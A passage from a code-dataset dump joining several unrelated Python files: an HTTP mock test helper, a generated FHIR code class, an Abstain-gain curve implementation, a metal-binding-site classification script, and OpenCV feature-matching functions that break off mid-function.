        self.do_get_responses: List[MockHTTPResponse] = []

        self.do_post_requests: List[MockHTTPRequests] = []
        self.do_post_responses: List[MockHTTPResponse] = []

        # Captured so the nested Handler class can reach this mock instance.
        _http_mock = self

        class Handler(SimpleHTTPRequestHandler):
            http_mock = _http_mock

            def _do_GET(self):
                # Record the incoming request ...
                parsed_path = urlparse(self.path)
                path_query = parse_qs(parsed_path.query)
                request = MockHTTPRequests(
                    "GET", self.path, parsed_path, path_query, self.headers
                )
                self.http_mock.do_get_requests.append(request)

                # ... then serve the next queued canned response. IndexError
                # here means the test queued too few responses.
                response = self.http_mock.do_get_responses.pop(0)
                self.send_response(response.status_code, response.reason_phrase)
                for header, values in response.headers.items():
                    for value in values:
                        self.send_header(header, value)
                self.end_headers()

                self.wfile.write(response.body)
                self.wfile.flush()
                return

            # Spy wrapper so tests can assert on call counts and arguments.
            (do_GET, do_GET_mock) = make_spypair(_do_GET)

            def _do_POST(self):
                # Same flow as _do_GET, but for POST requests/responses.
                parsed_path = urlparse(self.path)
                path_query = parse_qs(parsed_path.query)
                request = MockHTTPRequests(
                    "POST", self.path, parsed_path, path_query, self.headers
                )
                self.http_mock.do_post_requests.append(request)

                response = self.http_mock.do_post_responses.pop(0)
                self.send_response(response.status_code, response.reason_phrase)
                for header, values in response.headers.items():
                    for value in values:
                        self.send_header(header, value)
                self.end_headers()

                self.wfile.write(response.body)
                self.wfile.flush()
                return

            (do_POST, do_POST_mock) = make_spypair(_do_POST)

            def log_message(self, format: str, *args: Any) -> None:
                # Silence the default per-request stderr logging.
                pass

        self.Handler = Handler
        self.do_get_mock = Handler.do_GET_mock
        self.do_post_mock = Handler.do_POST_mock

    def reset(self):
        """Clear captured requests, queued responses, and spy call counts."""
        self.do_get_requests.clear()
        self.do_get_responses.clear()
        self.do_get_mock.reset_mock()

        self.do_post_requests.clear()
        self.do_post_responses.clear()
        self.do_post_mock.reset_mock()

    @property
    def call_count(self):
        # Total number of GET and POST requests handled so far.
        return self.do_post_mock.call_count + self.do_get_mock.call_count
class SimpleHTTPMockTests(unittest.TestCase):
    """Self-test for SimpleHTTPMock against a real ephemeral HTTP server."""

    def test_example(self) -> None:
        httpmock = SimpleHTTPMock()
        with ctx_http_server(httpmock.Handler) as server:
            url = "http://{}:{}".format(*server.server_address)

            # Queue the two responses the server should give, in order.
            httpmock.do_get_responses.append(
                MockHTTPResponse(404, "Not Found", b"gone away", {})
            )
            httpmock.do_get_responses.append(
                MockHTTPResponse(200, "OK", b"here it is", {})
            )

            # First request receives the queued 404.
            with self.assertRaises(HTTPError) as raised:
                urlopen(f"{url}/bad/path")
            assert raised.exception.code == 404

            # Validate the request the mock captured.
            req = httpmock.do_get_requests.pop(0)
            self.assertEqual(req.path, "/bad/path")

            # Second request receives the queued 200.
            resp = urlopen(f"{url}/")
            self.assertEqual(resp.status, 200)
            self.assertEqual(resp.read(), b"here it is")
            # NOTE: the original test ended by queueing two more responses
            # that were never requested; that dead code has been removed.
class ServedSimpleHTTPMock(SimpleHTTPMock, AbstractContextManager):
    """
    ServedSimpleHTTPMock is a SimpleHTTPMock with a HTTP server.

    Example usage:
    >>> with ServedSimpleHTTPMock() as httpmock:
    ...     # add a response the server should give:
    ...     httpmock.do_get_responses.append(
    ...         MockHTTPResponse(404, "Not Found", b"gone away", {})
    ...     )
    ...
    ...     # send a request to get the first response
    ...     http_error: Optional[HTTPError] = None
    ...     try:
    ...         urlopen(f"{httpmock.url}/bad/path")
    ...     except HTTPError as caught:
    ...         http_error = caught
    ...
    ...     assert http_error is not None
    ...     assert http_error.code == 404
    ...
    ...     # get and validate request that the mock received
    ...     req = httpmock.do_get_requests.pop(0)
    ...     assert req.path == "/bad/path"
    """

    def __init__(self, host: str = "127.0.0.1"):
        # Start an HTTP server on *host* (ephemeral port) in a daemon thread.
        super().__init__()
        self.server = HTTPServer((host, 0), self.Handler)
        self.server_thread = Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True
        self.server_thread.start()

    def stop(self) -> None:
        """Shut down the server and wait for its thread to terminate."""
        self.server.shutdown()
        self.server.socket.close()
        self.server_thread.join()

    @property
    def address_string(self) -> str:
        # "host:port" of the running server.
        (host, port) = self.server.server_address
        return f"{host}:{port}"

    @property
    def url(self) -> str:
        # Base URL clients should use to reach the mock server.
        return f"http://{self.address_string}"

    def __enter__(self) -> "ServedSimpleHTTPMock":
        return self

    def __exit__(
        self,
        __exc_type: Optional[Type[BaseException]],
        __exc_value: Optional[BaseException],
        __traceback: Optional[TracebackType],
    ) -> "te.Literal[False]":
        # Always stop the server; never suppress exceptions.
        self.stop()
        return False
class ServedSimpleHTTPMockTests(unittest.TestCase):
    """Self-test for ServedSimpleHTTPMock (mock plus embedded server)."""

    def test_example(self) -> None:
        with ServedSimpleHTTPMock() as httpmock:
            # Queue the two responses the server should give, in order.
            httpmock.do_get_responses.append(
                MockHTTPResponse(404, "Not Found", b"gone away", {})
            )
            httpmock.do_get_responses.append(
                MockHTTPResponse(200, "OK", b"here it is", {})
            )

            # First request receives the queued 404.
            with self.assertRaises(HTTPError) as raised:
                urlopen(f"{httpmock.url}/bad/path")
            assert raised.exception.code == 404

            # Validate the request the mock captured.
            req = httpmock.do_get_requests.pop(0)
            self.assertEqual(req.path, "/bad/path")

            # Second request receives the queued 200.
            resp = urlopen(f"{httpmock.url}/")
            self.assertEqual(resp.status, 200)
            self.assertEqual(resp.read(), b"here it is")
            # NOTE: the original test ended by queueing two more responses
            # that were never requested; that dead code has been removed.
def eq_(lhs, rhs, msg=None):
    """
    Assert that *lhs* equals *rhs*, using *msg* as the failure message.

    This mimics the function of the same name from nosetest. Ideally nothing
    should use it, but a lot of code still does, so this small polyfill is
    kept around for now.
    """
    if not msg:
        assert lhs == rhs
    else:
        assert lhs == rhs, msg
PurePathT = TypeVar("PurePathT", bound=PurePath)


def file_uri_to_path(
    file_uri: str,
    path_class: Type[PurePathT] = PurePath,  # type: ignore[assignment]
    url2pathname: Optional[Callable[[str], str]] = None,
) -> PurePathT:
    """
    Convert a ``file:`` URI into a ``pathlib.PurePath`` of the given flavour.

    :param str file_uri: The file URI to convert.
    :param class path_class: The type of path in the file_uri. By default it
        uses the system specific path pathlib.PurePath; to force a specific
        type of path pass pathlib.PureWindowsPath or pathlib.PurePosixPath.
    :param url2pathname: optional override for the URI-path to pathname
        translation; chosen automatically from *path_class* when omitted.
    :returns: the pathlib.PurePath object
    :rtype: pathlib.PurePath
    """
    if url2pathname is None:
        # Windows paths need the nt-specific unescaping (drive letters etc.);
        # everything else only needs percent-decoding.
        if isinstance(path_class(), PureWindowsPath):
            url2pathname = nt_url2pathname
        else:
            url2pathname = unquote
    uri_path = urlparse(file_uri).path
    return path_class(url2pathname(uri_path))
ParamsT = TypeVar("ParamsT", bound=tuple)
Marks = Collection[Union[Mark, MarkDecorator]]


def pytest_mark_filter(
    param_sets: Iterable[Union[ParamsT, ParameterSet]], mark_dict: Dict[ParamsT, Marks]
) -> Generator[ParameterSet, None, None]:
    """
    Attach extra marks (e.g. xfails) to matching test parameters.

    Yields a ``pytest.param`` for every entry of *param_sets*, extended with
    any marks registered under its values in *mark_dict*.
    """
    no_marks = cast(Marks, ())
    for param_set in param_sets:
        if isinstance(param_set, ParameterSet):
            extra = mark_dict.get(cast(ParamsT, param_set.values), no_marks)
            yield pytest.param(
                *param_set.values,
                id=param_set.id,
                marks=[*param_set.marks, *extra],
            )
        else:
            yield pytest.param(
                *param_set, marks=mark_dict.get(param_set, no_marks)
            )
| StarcoderdataPython |
1721502 | from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class CatalogEntryRelationTypeCode(GenericTypeCode):
    """
    CatalogEntryRelationType
    From: http://hl7.org/fhir/relation-type in valuesets.xml
        The type of relations between entries.
    """

    def __init__(self, value: AutoMapperTextInputType):
        # A code is simply a wrapped text value from this code system.
        super().__init__(value=value)

    """
    http://hl7.org/fhir/relation-type
    """
    # URI of the FHIR code system this code belongs to.
    codeset: FhirUri = "http://hl7.org/fhir/relation-type"
class CatalogEntryRelationTypeCodeValues:
    # NOTE: each triple-quoted string below describes the attribute that
    # follows it (the code generator emits descriptions first).
    """
    the related entry represents an activity that may be triggered by the current
    item.
    From: http://hl7.org/fhir/relation-type in valuesets.xml
    """
    Triggers = CatalogEntryRelationTypeCode("triggers")
    """
    the related entry represents an item that replaces the current retired item.
    From: http://hl7.org/fhir/relation-type in valuesets.xml
    """
    ReplacedBy = CatalogEntryRelationTypeCode("is-replaced-by")
| StarcoderdataPython |
3229667 | <reponame>perellonieto/background_check
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import auc
import warnings
class AbstainGainCurve:
    """This class represents an Abstain-gain (AG) curve. An object of class
    AbstainGainCurve is built based on the result of two models:
    1- The first one is a training data vs reject data classifier and its
       recall and precision values at various thresholds are used to build
       the curve;
    2- The second (binary) classifier was trained to separate both classes of
       the original training data. Its gain values for all recall values of
       the first classifier are multiplied by the corresponding precision
       values and used to build the curve.

    Args:
        step1_reject_scores ([float]): Positive scores for the reject data,
            obtained from the training data vs reject data classifier.
        step1_training_scores ([float]): Positive scores for the training
            data, obtained from the training data vs reject data classifier.
        step2_training_scores ([float]): Positive scores for the training
            data, obtained from the second classifier.
        training_labels ([int]): Labels of the training data. 1 for the
            positive class and 0 for the negative class.
        gain (str): Which type of gain is used to evaluate the second
            classifier.
        step2_threshold (float): Threshold used to calculate the gain of the
            second classifier.

    Attributes:
        thresholds ([float]): Thresholds corresponding to the recall and
            precision values.
        recalls ([float]): Recalls of the first classifier.
        precisions ([float]): Precisions of the first classifier.
        gains ([float]): Gain values of the second classifier on the
            training instances accepted at each threshold.
        gain_type (str): Which type of gain is used.
        positive_proportion (float): proportion of positives (true training
            data) scored by the first classifier.
    """

    # NOTE: `np.alen` (used in the original) was removed in NumPy 1.23;
    # plain `len()` is equivalent here and used throughout.
    def __init__(self, step1_reject_scores, step1_training_scores,
                 step2_training_scores,
                 training_labels, gain="accuracy", step2_threshold=0.5):
        """Build the AG curve by sweeping a threshold over the step-1 scores."""
        # Candidate thresholds: +inf plus every distinct score, descending.
        pos_scores = np.append(np.inf, np.unique(np.append(
            step1_training_scores, step1_reject_scores))[::-1])
        self.thresholds = np.ones(len(pos_scores)) * -1.0
        self.recalls = np.zeros(len(pos_scores))
        self.precisions = np.zeros(len(pos_scores))
        self.gains = np.zeros(len(pos_scores))
        self.gain_type = gain
        self.positive_proportion = len(step1_training_scores) / (
            len(step1_training_scores) + len(step1_reject_scores))
        self.mod_gains_ag = np.zeros(len(pos_scores))
        self.recalls_ag = np.zeros(len(pos_scores))
        all_accepted_training = np.zeros((len(pos_scores),
                                          len(training_labels)))

        # Baseline gain of the second classifier over all training data.
        g = calculate_gain(step2_training_scores, training_labels, gain=gain,
                           threshold=step2_threshold)

        for i, threshold in enumerate(pos_scores):
            n_accepted_rejects = np.sum(step1_reject_scores >= threshold)
            accepted_training = step1_training_scores >= threshold
            new_recall = np.sum(accepted_training) / len(training_labels)
            # Only record a point when the recall actually changes; skipped
            # iterations keep threshold == -1 and are filtered out below.
            if i == 0 or new_recall != self.recalls[i - 1]:
                self.thresholds[i] = threshold
                self.recalls[i] = new_recall
                all_accepted_training[i] = accepted_training
                if (np.sum(accepted_training) + n_accepted_rejects) == 0.0:
                    self.precisions[i] = np.nan
                else:
                    self.precisions[i] = np.sum(accepted_training) / (
                        np.sum(accepted_training) + n_accepted_rejects)
                accepted_scores = step2_training_scores[accepted_training]
                accepted_labels = training_labels[accepted_training]
                self.gains[i] = calculate_gain(accepted_scores,
                                               accepted_labels,
                                               gain=gain,
                                               threshold=step2_threshold)
                # Rescale against the trivial accept-everything baseline.
                denominator = (1.0 - g * self.positive_proportion)
                self.mod_gains_ag[i] = (self.gains[i] * self.precisions[i] -
                                        g * self.positive_proportion) / denominator
                self.recalls_ag[i] = (self.recalls[i] -
                                      g * self.positive_proportion) / denominator

        # Drop the iterations that did not produce a new recall value.
        keep = self.thresholds > -1.0
        self.recalls = self.recalls[keep]
        self.gains = self.gains[keep]
        self.precisions = self.precisions[keep]
        self.mod_gains_ag = self.mod_gains_ag[keep]
        self.recalls_ag = self.recalls_ag[keep]
        all_accepted_training = all_accepted_training[keep]
        self.thresholds = self.thresholds[keep]

        [self.recalls_ag, self.mod_gains_ag] = generate_crossing_points(
            all_accepted_training.astype(bool),
            step1_reject_scores, step1_training_scores,
            step2_training_scores,
            training_labels, self.recalls_ag,
            self.mod_gains_ag,
            g * self.positive_proportion,
            gain=self.gain_type,
            threshold=step2_threshold)
        self.mod_gains_ag = self.mod_gains_ag[self.recalls_ag >= 0]
        self.recalls_ag = self.recalls_ag[self.recalls_ag >= 0]

    def plot(self, fig=None, baseline=True):
        """This method plots the AG curve, with the rescaled recalls of the
        first classifier on the x-axis and the rescaled gain*precision values
        on the y-axis.

        Args:
            fig (object): An object of a Matplotlib figure
                (as obtained by using Matplotlib's figure() function).
            baseline (bool): accepted for API compatibility; the baseline is
                not currently drawn by this implementation.

        Returns:
            Nothing.
        """
        # Ignore warnings from matplotlib
        warnings.filterwarnings("ignore")
        if fig is None:
            fig = plt.figure()
        plt.plot(self.recalls_ag, self.mod_gains_ag, 'k.-')
        # Raw strings avoid invalid-escape warnings for the mathtext labels.
        plt.xlabel(r"$\mathrm{Recall}_1-AG$")
        plt.ylabel(r"$\mathrm{Accuracy'}_2-AG$")
        axes = plt.gca()
        axes.set_xlim([0.0, 1.01])
        axes.set_ylim([0.0, 1.0])
        axes.spines['top'].set_visible(False)
        axes.spines['right'].set_visible(False)
        axes.get_xaxis().tick_bottom()
        axes.get_yaxis().tick_left()
        plt.show()

    def calculate_area(self):
        """This method calculates the area under the AG curve, by invoking
        Scikit Learn's auc function (trapezoid rule). Points are sorted by
        x first; older scikit-learn did this via ``auc(..., reorder=True)``,
        a parameter that has since been removed.

        Args:
            None.

        Returns:
            float: The area under the Abstain-gain curve.
        """
        order = np.argsort(self.recalls_ag)
        return auc(self.recalls_ag[order], self.mod_gains_ag[order])
def calculate_gain(accepted_scores, accepted_labels, gain="accuracy",
                   threshold=0.5):
    """This function calculates the gain of the second classifier, based on
    the true training instances accepted by the first classifier.

    Args:
        accepted_scores ([float]): Positive scores obtained from the second
            classifier for the true training data accepted by the first
            classifier.
        accepted_labels ([int]): Labels of the true training data accepted
            by the first classifier. 1 for the positive class and 0 for the
            negative class.
        gain (str): Which type of gain is used; only "accuracy" is handled.
        threshold (float): Threshold applied to *accepted_scores*.

    Returns:
        float: The gain of the second classifier, or NaN when no instances
        were accepted.
    """
    # NOTE: `np.alen` (used in the original) was removed in NumPy 1.23;
    # `len()` is equivalent for these 1-D arrays.
    if gain == "accuracy":
        if len(accepted_labels) == 0:
            return np.nan
        predictions = accepted_scores >= threshold
        # Correct instances are those where prediction and label agree.
        n_correct_instances = np.sum(np.logical_not(
            np.logical_xor(predictions, accepted_labels == 1)))
        return n_correct_instances / len(accepted_labels)
    # NOTE(review): any other `gain` value falls through and returns None,
    # unchanged from the original behaviour.
def generate_crossing_points(all_accepted_training, step1_reject_scores,
                             step1_training_scores, step2_training_scores,
                             training_labels,
                             recalls_ag, mod_gains_ag,
                             baseline, gain="accuracy", threshold=0.5):
    """Extend the AG curve with its axis-crossing end points.

    If the first non-negative point has a positive recall-AG, accepted
    training instances are removed one at a time (lowest step-1 score first,
    ties broken at random) until the recall-AG reaches zero, and the
    resulting left-hand crossing point is inserted. A final (1, 0) point is
    appended when the curve does not already reach the x axis on the right.

    Returns:
        [recalls_ag, mod_gains_ag]: the extended coordinate arrays.
    """
    # NOTE: `np.alen` (used in the original) was removed in NumPy 1.23;
    # `len()` is equivalent here.
    non_negative_indices = np.where(recalls_ag >= 0)[0]
    j = np.amin(non_negative_indices)
    if recalls_ag[j] > 0:
        rag = recalls_ag[j]
        true_positives = all_accepted_training[j]
        while rag > 0:
            # Drop one of the lowest-scoring accepted training instances.
            min_accepted_score = np.amin(step1_training_scores[true_positives])
            index = np.random.choice(np.where(step1_training_scores ==
                                              min_accepted_score)[0], 1)
            true_positives[index] = False
            new_recall = np.sum(true_positives) / len(training_labels)
            rag = (new_recall - baseline) / (1.0 - baseline)
        accepted_rejects = step1_reject_scores >= min_accepted_score
        new_precision = np.sum(true_positives) / (
            np.sum(true_positives) + np.sum(accepted_rejects))
        new_gain = calculate_gain(step2_training_scores[true_positives],
                                  training_labels[true_positives],
                                  gain=gain,
                                  threshold=threshold)
        new_mod_gain_ag = (new_gain * new_precision - baseline) / (1 - baseline)
        recalls_ag = np.insert(recalls_ag, j, 0)
        mod_gains_ag = np.insert(mod_gains_ag, j, new_mod_gain_ag)

    # Add final point in the right-hand side of the curve
    min_mod_gain_ag = np.amin(mod_gains_ag[non_negative_indices])
    if min_mod_gain_ag > 0:
        recalls_ag = np.append(recalls_ag, 1)
        mod_gains_ag = np.append(mod_gains_ag, 0)
    return [recalls_ag, mod_gains_ag]
| StarcoderdataPython |
3327477 | <filename>ClassifyAllSites.py
import sys
import torch
import matplotlib.pyplot as plt
#from metalsiteprediction.ConvRecurrent.utils import getTestLoader, get_model
#from metalsiteprediction.ConvRecurrent.utils import getIronLoader, iron_path
#from metalsiteprediction.ConvRecurrent.trainer import predict, estimate
#from metalsiteprediction.ConvRecurrent.utils import readSitePickle
from utils import getTestLoader, get_model
from utils import getIronLoader, iron_path
from predict import predict, estimate
from utils import readSitePickle
import argparse
from datetime import datetime
import copy
import pandas as pd
import math
import pathlib
# Timestamp used to tag the output CSV file names.
# NOTE(review): the strftime format "%Y%m%d%_H%M%S" contains "%_H" -- on
# glibc that is a space-padded hour, elsewhere it may be emitted literally;
# the intent was presumably "%Y%m%d_%H%M%S". Confirm before changing, as it
# alters output file names.
now = datetime.now().strftime("%Y%m%d%_H%M%S")

parser = argparse.ArgumentParser(description="Automatic peaks assignement tool")

# CUDA for PyTorch: use the first GPU when available, otherwise the CPU.
use_cuda = torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
#device = "cpu"
# Let cuDNN pick the fastest convolution algorithms for fixed-size inputs.
torch.backends.cudnn.benchmark = True

parser.add_argument(
    "--metal",
    choices=['iron', 'zinc'],
    help="The metal data to classify",
    required=True)
def run_zinc_classification():
    """
    Run the 10-fold zinc test-set classification and dump results to CSV.

    For each fold, loads that fold's model and test loader, collects the
    model outputs / labels / site names, and prints per-fold accuracy.
    Finally prints the mean and overall accuracy and writes the per-site
    class probabilities to ``Zinc_Classifications<timestamp>.csv``.
    """
    outputs = []
    labels_per_fold = []
    site_names = []
    fold_accuracies = []

    for fold in range(10):
        print(f"FOLD {fold}", "==" * 30)
        model = get_model(fold)  # torch.load(os.path.join(models_dir, f"F{f_idx}_R0"), map_location=device)
        loader = getTestLoader(fold)

        output, labels, names = estimate(model, loader)
        fold_acc = (output.argmax(dim=1) == labels).float().mean()
        fold_accuracies.append(fold_acc)
        print("Fold acc: ", fold_acc)
        print(output.size())
        print(labels.size())

        outputs.append(output)
        labels_per_fold.append(labels)
        site_names += names

    all_outputs = torch.cat(outputs, dim=0)
    all_labels = torch.cat(labels_per_fold, dim=0)
    print(site_names)
    print(len(site_names))
    print(all_outputs.size())
    print(all_labels.size())

    acc_mean = sum(fold_accuracies) / len(fold_accuracies)
    overall_acc = (all_outputs.argmax(dim=1) == all_labels).float().mean()
    print("Mean acc: ", acc_mean, overall_acc)

    classifications = pd.DataFrame({'site': site_names,
                                    'P(0)': all_outputs[:, 0],
                                    'P(1)': all_outputs[:, 1],
                                    'LABEL': all_labels})
    classifications.to_csv(f"Zinc_Classifications{now}.csv", index=False)
def run_iron_classification():
    """Classify the iron data with the zinc-trained model(s) and dump a CSV."""
    # Since there are ten models... average over the 10... ???
    # Map each site to the metal-binding sites it contains.
    d = pathlib.Path("mapping_iron.csv")
    mapping_df = pd.read_csv(d)
    mapping_df = mapping_df.set_index('OldName')
    print(mapping_df)

    ironLoader = getIronLoader(batch_size=32)
    # NOTE(review): classifications_df is assigned but never used below.
    classifications_df = None
    print("= ="*20)
    print("= =" * 20)
    acc0s = []
    acc1s = []
    # We should average over all folds.
    # NOTE(review): only fold 0 is evaluated (range(1)) despite the comment.
    for f_idx in range(1):
        print(f"FOLD {f_idx} Model", "=="*50)
        zincTrainedModel = get_model(f_idx)
        # Average the classifications... write a function that does it
        # and put it somewhere; it will be needed again.
        print("Estimating...")
        output, labels, site_names = estimate(zincTrainedModel, ironLoader)

        # Per-site metadata: number of involved iones and sequence length.
        N_iones = []
        Site_len = []
        for site in site_names:
            rowsite = readSitePickle(iron_path.joinpath(site+".pkl"), to_transform=False)
            involved_iones = mapping_df.loc[site, 'Sites'].split(';')
            N_iones.append(len(involved_iones))
            Site_len.append(len(rowsite['fasta']))
            print(site, " --> ", mapping_df.loc[site, 'Sites'], len(involved_iones))

        #if classifications_df != None:
        classifications = pd.DataFrame({'site': site_names,
                                        'P(0)': output[:, 0],
                                        'P(1)': output[:, 1],
                                        '#iones': N_iones,
                                        'Len': Site_len,
                                        'LABEL': labels})
        #print(classifications)

        # Overall accuracy plus per-class (label 0 / label 1) accuracy.
        accuracy = (output.argmax(dim=1) == labels).float().mean()
        C0_idxs = labels == 0
        C1_idxs = labels == 1
        print(len(C0_idxs.nonzero()), C0_idxs.sum())
        print(len(C1_idxs.nonzero()), C1_idxs.sum())
        print("Acc: ", accuracy)
        accuracy0 = (output[C0_idxs].argmax(dim=1) == labels[C0_idxs]).float().mean()
        accuracy1 = (output[C1_idxs].argmax(dim=1) == labels[C1_idxs]).float().mean()
        print(f"#C0 {C0_idxs.sum()}, #C1 {C1_idxs.sum()}")
        print("ACC0", accuracy0, "ACC1", accuracy1)
        acc0s.append(accuracy0)
        acc1s.append(accuracy1)

    print(classifications)
    print(acc0s)
    print(acc1s)
    print("AVGs Results:")
    print(sum(acc0s)/len(acc0s))
    print(sum(acc1s) / len(acc1s))
    classifications.to_csv(f"Iron_Classifications{now}.csv", index=False)

    # Accuracy restricted to single-ion sites, split by label.
    classifications1 = classifications[classifications['#iones'] == 1]
    classificationsL1 = classifications1[classifications1['LABEL'] == 1]
    output = classificationsL1[['P(0)', 'P(1)']].to_numpy()
    labels = classificationsL1['LABEL'].to_numpy()
    #print(output)
    #print(labels)
    accuracyL1 = (output.argmax(axis=1) == labels).mean()
    print(accuracyL1)

    classificationsL0 = classifications1[classifications1['LABEL'] == 0]
    output = classificationsL0[['P(0)', 'P(1)']].to_numpy()
    labels = classificationsL0['LABEL'].to_numpy()
    #print(output)
    #print(labels)
    accuracyL0 = (output.argmax(axis=1) == labels).mean()
    print(accuracyL0)

    return classifications
#run_zinc_classification()
#run_iron_classification()

if __name__ == '__main__':
    # Dispatch on the required --metal argument (iron or zinc).
    args = parser.parse_args()
    print(args)

    if args.metal == 'zinc':
        print("Running zinc data classification")
        run_zinc_classification()
    else:
        print("Running iron data classification")
        run_iron_classification()
| StarcoderdataPython |
73242 | #!/usr/bin/env python
import numpy as np
import cv2
def findCenterOfTarget(dst):
    """Return the centroid of the target's corner points (mean over axis 0)."""
    center = np.mean(dst, axis=0)
    return center
# def kaze_match(im1_path, im2_path):
def kaze_match(img1, img2):
    """
    Locate *img1* (template) inside *img2* using AKAZE features.

    When enough good matches are found, draws the projected template
    outline and its centre on *img2*. Returns the side-by-side match
    visualisation image; also shows it in an "AKAZE matching" window.
    """
    # BUG FIX: the original tested `shape[2] == 1` before converting
    # BGR->GRAY, which is backwards -- a 3-channel BGR image is the one that
    # needs conversion (and `h, w = gray1.shape` below requires 2-D arrays).
    if img1.ndim == 3 and img1.shape[2] == 3:
        gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
        gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
    else:
        gray1 = img1
        gray2 = img2

    # initialize the AKAZE descriptor, then detect keypoints and extract
    # local invariant descriptors from the image
    detector = cv2.AKAZE_create()
    (kp1, descs1) = detector.detectAndCompute(gray1, None)
    (kp2, descs2) = detector.detectAndCompute(gray2, None)

    print("keypoints: {}, descriptors: {}".format(len(kp1), descs1.shape))
    print("keypoints: {}, descriptors: {}".format(len(kp2), descs2.shape))

    # Match the features (Hamming norm for AKAZE's binary descriptors).
    bf = cv2.BFMatcher(cv2.NORM_HAMMING)
    matches = bf.knnMatch(descs1, descs2, k=2)  # typo fixed

    # Apply ratio test
    good = []
    for m, n in matches:
        if m.distance < 0.9 * n.distance:
            good.append(m)

    MIN_MATCH_COUNT = 5
    if len(good) > MIN_MATCH_COUNT:
        src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
        dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)

        M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)

        h, w = gray1.shape
        pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
        dst = cv2.perspectiveTransform(pts, M)

        # Find the center and draw it
        center = findCenterOfTarget(dst)
        img2 = cv2.circle(img2, (center[0][0], center[0][1]), 10, (255, 0, 0), -1)
        img2 = cv2.polylines(img2, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
    else:
        print("Not enough matches are found - %d/%d" % (len(good), MIN_MATCH_COUNT))

    # NOTE: the original built a `draw_params` dict here but never passed it
    # to drawMatches; that unused code has been removed.
    img3 = cv2.drawMatches(img1, kp1, img2, kp2, good, None)
    cv2.imshow("AKAZE matching", img3)
    cv2.waitKey(10)
    return img3
def FLANNBasedMatcher(img1, img2):
    """
    Locate *img1* (template) inside *img2* using SIFT features matched with
    the FLANN-based matcher; draws inlier matches and the projected outline.

    Returns the match visualisation image; also shows it in a window.
    """
    # BUG FIX: the original tested `shape[2] == 1` before converting
    # BGR->GRAY, which is backwards -- a 3-channel BGR image is the one that
    # needs conversion (and `h, w = gray1.shape` below requires 2-D arrays).
    if img1.ndim == 3 and img1.shape[2] == 3:
        gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
        gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
    else:
        gray1 = img1
        gray2 = img2

    # Initiate SIFT detector
    sift = cv2.xfeatures2d.SIFT_create()

    # find the keypoints and descriptors with SIFT
    kp1, des1 = sift.detectAndCompute(img1, None)
    kp2, des2 = sift.detectAndCompute(img2, None)

    FLANN_INDEX_KDTREE = 0
    index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
    search_params = dict(checks=50)

    flann = cv2.FlannBasedMatcher(index_params, search_params)
    matches = flann.knnMatch(des1, des2, k=2)

    # store all the good matches as per Lowe's ratio test.
    good = []
    for m, n in matches:
        if m.distance < 0.7 * n.distance:
            good.append(m)

    MIN_MATCH_COUNT = 5
    if len(good) > MIN_MATCH_COUNT:
        src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
        dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)

        M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
        matchesMask = mask.ravel().tolist()

        h, w = gray1.shape
        pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
        dst = cv2.perspectiveTransform(pts, M)

        # Find the center and draw it
        center = findCenterOfTarget(dst)
        img2 = cv2.circle(img2, (center[0][0], center[0][1]), 10, (255, 0, 0), -1)
        img2 = cv2.polylines(img2, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
    else:
        # BUG FIX: was a Python-2-only `print` statement; this call form
        # works under both Python 2 and 3.
        print("Not enough matches are found - %d/%d" % (len(good), MIN_MATCH_COUNT))
        matchesMask = None

    draw_params = dict(matchColor=(0, 255, 0),  # draw matches in green color
                       singlePointColor=None,
                       matchesMask=matchesMask,  # draw only inliers
                       flags=2)

    img3 = cv2.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)
    cv2.imshow("FLANNBasedMatcher", img3)
    cv2.waitKey(10)
    return img3
def BruteForceMatchingwithSIFTDescriptorsandRatioTest(img1, img2):
    """
    Locate *img1* (template) inside *img2* using SIFT features with
    brute-force matching and Lowe's ratio test.

    Returns an ``(img3, center)`` pair: the match visualisation image and
    the detected target centre (``None`` when too few matches were found).
    NOTE(review): both inputs are assumed to be 3-channel BGR images --
    cvtColor below fails otherwise; confirm against callers.
    """
    center = None
    gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
    gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)

    # Initiate SIFT detector
    sift = cv2.xfeatures2d.SIFT_create()

    # find the keypoints and descriptors with SIFT
    kp1, des1 = sift.detectAndCompute(gray1, None)
    kp2, des2 = sift.detectAndCompute(gray2, None)

    # BFMatcher with default params
    bf = cv2.BFMatcher()
    matches = bf.knnMatch(des1, des2, k=2)

    # Apply ratio test
    good = []
    for m, n in matches:
        if m.distance < 0.75 * n.distance:
            good.append(m)

    MIN_MATCH_COUNT = 10
    if len(good) > MIN_MATCH_COUNT:
        src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
        dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
        # center = np.mean(dst_pts, axis=0)
        # print center[0]
        M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
        matchesMask = mask.ravel().tolist()

        h, w = gray1.shape
